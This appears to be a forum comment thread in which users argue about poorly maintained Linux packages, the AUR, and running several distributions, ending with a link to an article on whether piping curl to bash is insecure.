Yeah, and again, that's just an example of a problem that has a large gradient of issues. An even better example might be apt and logstash, since both are considered "not shit" by many. I realize it's a large and unbearably difficult problem, but when so many devs just say, "Fuck it, it's going live" and don't maintain their repos or push the repo managers to maintain them, it's a problem. Shrugging these problems off like you're doing does nothing to solve the problem.
I'm the user and I'm feeling these effects hard and I'm speaking loudly so that some devs may hopefully listen and respect their product, not just their code.
If it were entirely easy it would have already been automated and you wouldn't have a job.
-Why would you deal with 4 different distros? Wouldn't it be a lot easier to learn the quirks of one or two?
-Expecting every single package on something like the AUR, which allows anyone to contribute, to all be of optimum quality seems a bit optimistic. Why would you use Arch and the AUR if you want low maintenance?
-If you have constant issues you are either in the wrong profession, picked the wrong employer, or the wrong software.
-Way to be dismissive. I work with two professionally and two at home. Not that simple.
-aur is just an example, but there are many, many "live" packages on there that aren't close to production ready like they think they are. A better example might be something like skype, whose repos last time I checked fail during install without a LOT of work. There's an enormous lack of QAing in packaging out there.
-That's incredibly dismissive of you again. Mind you, linux admin work is only my job. I do data science, low latency freelance work, security and networking as a hobby, so the extent of the software I use is comparatively large compared to most.
It's funny how so many obvious things are all but obvious when you think a little bit more about it. Interesting read on the subject: https://sandstorm.io/news/2015-09-24-is-curl-bash-insecure-p...
(I don't want to enter the `curl | bash` good or bad rabbit hole; just that the topic cannot be just dismissed as "obvious")